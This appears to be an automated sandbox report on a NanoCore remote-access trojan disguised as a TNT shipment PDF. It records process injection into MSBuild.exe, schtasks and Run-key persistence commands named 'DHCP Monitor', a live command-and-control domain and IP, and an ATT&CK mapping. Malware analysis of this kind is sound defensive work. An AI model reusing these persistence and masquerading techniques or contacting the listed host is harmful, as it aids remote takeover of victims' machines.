      Source: 15.2.dhcpmon.exe.10000.0.unpack, Microsoft.Build/Shared/NativeMethodsShared.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXESection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and writeJump to behavior
      Writes to foreign memory regionsShow sources
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: DA2008Jump to behavior
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXEProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE' Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp731A.tmp'Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7609.tmp'Jump to behavior
      Source: MSBuild.exe, 00000003.00000002.1042604643.00000000030E8000.00000004.00000001.sdmpBinary or memory string: Program ManagerD$\k
      Source: MSBuild.exe, 00000003.00000002.1047063541.000000000616D000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: MSBuild.exe, 00000003.00000002.1042222236.00000000018C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: MSBuild.exe, 00000003.00000002.1042222236.00000000018C0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: MSBuild.exe, 00000003.00000002.1044112934.000000000355D000.00000004.00000001.sdmpBinary or memory string: Program ManagerX
      Source: MSBuild.exe, 00000003.00000002.1043649373.00000000034A0000.00000004.00000001.sdmpBinary or memory string: Program Managerx
      Source: MSBuild.exe, 00000003.00000002.1042222236.00000000018C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: MSBuild.exe, 00000003.00000002.1043649373.00000000034A0000.00000004.00000001.sdmpBinary or memory string: Program ManagerHa\k
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A5BFC2 cpuid 1_2_00A5BFC2
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_00A61853
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_00A61217
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: GetLocaleInfoEx,__wcsnicmp,_TestDefaultCountry,_TestDefaultCountry,1_2_00A67C6E
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_00A60E0E
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,1_2_00A6461A
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: EnumSystemLocalesEx,1_2_00A5EF97
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: GetLocaleInfoEx,1_2_00A5EFCC
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_00A5EF1F
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,1_2_00A5A778
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXECode function: 1_2_00A5C9C7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,1_2_00A5C9C7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1044661467.00000000040D9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1041355870.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2204, type: MEMORY
      Source: Yara matchFile source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.MSBuild.exe.6580000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.MSBuild.exe.6580000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE

      Remote Access Functionality:

      barindex
      Detected Nanocore RatShow sources
      Source: MSBuild.exe, 00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: MSBuild.exe, 00000003.00000002.1044661467.00000000040D9000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000001.00000002.656614146.0000000000AB0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1047366764.0000000006580000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1044661467.00000000040D9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1041355870.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2204, type: MEMORY
      Source: Yara matchFile source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.MSBuild.exe.6580000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.ab0000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.MSBuild.exe.6580000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScheduled Task/Job11Scheduled Task/Job11Process Injection212Masquerading2Input Capture11System Time Discovery1Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsNative API11Boot or Logon Initialization ScriptsScheduled Task/Job11Virtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery31Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection212NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol22Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsSystem Information Discovery33VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 343026 Sample: TNT SHIPMENT  AWB_IMAGE CI_... Startdate: 22/01/2021 Architecture: WINDOWS Score: 100 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 12 other signatures 2->54 8 TNT SHIPMENT  AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE 1 2->8         started        11 dhcpmon.exe 4 2->11         started        13 dhcpmon.exe 3 2->13         started        15 MSBuild.exe 2 2->15         started        process3 signatures4 58 Writes to foreign memory regions 8->58 60 Maps a DLL or memory area into another process 8->60 17 MSBuild.exe 1 12 8->17         started        22 conhost.exe 8->22         started        24 conhost.exe 11->24         started        26 conhost.exe 13->26         started        28 conhost.exe 15->28         started        process5 dnsIp6 44 mimi121.duckdns.org 91.193.75.155, 49737, 49738, 49741 DAVID_CRAIGGG Serbia 17->44 46 192.168.2.1 unknown unknown 17->46 38 C:\Users\user\AppData\Roaming\...\run.dat, data 17->38 dropped 40 C:\Users\user\AppData\Local\...\tmp731A.tmp, XML 17->40 dropped 42 C:\Program Files (x86)\...\dhcpmon.exe, PE32 17->42 dropped 56 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->56 30 schtasks.exe 1 17->30         started        32 schtasks.exe 1 17->32         started        file7 signatures8 process9 process10 34 conhost.exe 30->34         started        36 conhost.exe 32->36         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE24%MetadefenderBrowse
      TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE59%ReversingLabsWin32.Spyware.Noon
      TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%MetadefenderBrowse
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      1.2.TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE.e30000.2.unpack100%AviraHEUR/AGEN.1110392Download File
      3.2.MSBuild.exe.6580000.4.unpack100%AviraTR/NanoCore.fadteDownload File
      3.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      mimi121.duckdns.org
      		91.193.75.155
      		truetrue
        		unknown

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        91.193.75.155
        		unknownSerbia
        		209623DAVID_CRAIGGGtrue

        Private

        IP
        192.168.2.1

        General Information

        Joe Sandbox Version:31.0.0 Red Diamond
        Analysis ID:343026
        Start date:22.01.2021
        Start time:07:29:39
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 9m 53s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:32
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@16/11@26/2
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 57.2% (good quality ratio 52.8%)
        • Quality average: 81.9%
        • Quality standard deviation: 30.4%
        HCA Information:
        • Successful, ratio: 96%
        • Number of executed functions: 84
        • Number of non-executed functions: 37
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .EXE
        Warnings:
        Show All
        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
        • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.43.193.48, 51.11.168.160, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129, 2.20.142.209, 2.20.142.210
        • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net
        • Report size exceeded maximum capacity and may have missing behavior information.
        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/343026/sample/TNT SHIPMENT AWB_IMAGE CI_FROM TNT AWB# 167095453_PDF_________.EXE

        Simulations

        Behavior and APIs

        TimeTypeDescription
        07:30:33AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        07:30:34Task SchedulerRun new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" s>$(Arg0)
        07:30:34Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
        07:30:34API Interceptor1546x Sleep call for process: MSBuild.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        91.193.75.155file.exeGet hashmaliciousBrowse
          Enquiry No ANS700_Pdf___.exeGet hashmaliciousBrowse
            Enquiry No ANS700_Pdf___.exeGet hashmaliciousBrowse

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              mimi121.duckdns.orgfile.exeGet hashmaliciousBrowse
              • 91.193.75.155
              Enquiry No ANS700_Pdf___.exeGet hashmaliciousBrowse
              • 91.193.75.155
              Enquiry No ANS700_Pdf___.exeGet hashmaliciousBrowse
              • 91.193.75.155

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              DAVID_CRAIGGG9A87wdxsuh.exeGet hashmaliciousBrowse
              • 91.193.75.204
              PROOF OF PAYMENT.exeGet hashmaliciousBrowse
              • 185.140.53.131
              SecuriteInfo.com.Artemis1A5E2411DEA6.exeGet hashmaliciousBrowse
              • 91.193.75.204
              Payment Invoice PDF.exeGet hashmaliciousBrowse
              • 185.244.30.18
              New Doc 20211401#_our new price.exeGet hashmaliciousBrowse
              • 91.193.75.243
              company profile.exeGet hashmaliciousBrowse
              • 185.140.53.227
              NEWORDERrefno0992883jpg.exeGet hashmaliciousBrowse
              • 185.140.53.253
              richiealvin.exeGet hashmaliciousBrowse
              • 91.193.75.185
              Quotation.exeGet hashmaliciousBrowse
              • 185.140.53.154
              DHL Delivery Shipping Cargo. Pdf.exeGet hashmaliciousBrowse
              • 185.244.30.18
              CompanyLicense.exeGet hashmaliciousBrowse
              • 185.140.53.253
              Purchase Order 2094742424.exeGet hashmaliciousBrowse
              • 185.244.30.132
              PURCHASE OREDER. PRINT. pdf.exeGet hashmaliciousBrowse
              • 91.193.75.45
              PO.exeGet hashmaliciousBrowse
              • 185.140.53.234
              SWIFT.exeGet hashmaliciousBrowse
              • 185.140.53.154
              SecuriteInfo.com.BScope.Trojan-Dropper.Injector.exeGet hashmaliciousBrowse
              • 185.140.53.234
              PROOF OF PAYMENT.exeGet hashmaliciousBrowse
              • 185.140.53.131
              Orden n.#U00ba STL21119, pdf.exeGet hashmaliciousBrowse
              • 185.140.53.129
              Proof of Payment.exeGet hashmaliciousBrowse
              • 185.244.30.51
              DxCHoDnNLn.exeGet hashmaliciousBrowse
              • 185.140.53.202

              JA3 Fingerprints

              No context

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeNew Order_PO#060317_007_Pdf________________________________________.exeGet hashmaliciousBrowse
                file.exeGet hashmaliciousBrowse
                  jCLiY7TCmD.exeGet hashmaliciousBrowse
                    WkyJ4e1mGH.exeGet hashmaliciousBrowse
                      Enquiry No ANS700_Pdf___.exeGet hashmaliciousBrowse
                        Enquiry No ANS700_Pdf___.exeGet hashmaliciousBrowse
                          P.I - AE-SA-10016 - SIG SHARBTLY INTERNATIONAL GROUP.exeGet hashmaliciousBrowse
                            Purchase Order 40,7045.exeGet hashmaliciousBrowse
                              PAYMENT ADVICE.exeGet hashmaliciousBrowse
                                Swift Copy.exeGet hashmaliciousBrowse
                                  Quotation Request-RFQ#2020-11-19.exeGet hashmaliciousBrowse
                                    Api Details.exeGet hashmaliciousBrowse
                                      BALANCE PAYMENT.exeGet hashmaliciousBrowse
                                        5dj4XCE86M.exeGet hashmaliciousBrowse
                                          z865yM9Ehy.exeGet hashmaliciousBrowse
                                            EXPORT SHIPMENT CERTIFIED 2.exeGet hashmaliciousBrowse
                                              4IZjnTicql.exeGet hashmaliciousBrowse
                                                K1Rul7dwGf.exeGet hashmaliciousBrowse
                                                  14RP4w9CuA.exeGet hashmaliciousBrowse
                                                    Bx757nPqML.exeGet hashmaliciousBrowse

                                                      Created / dropped Files

                                                      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):261728
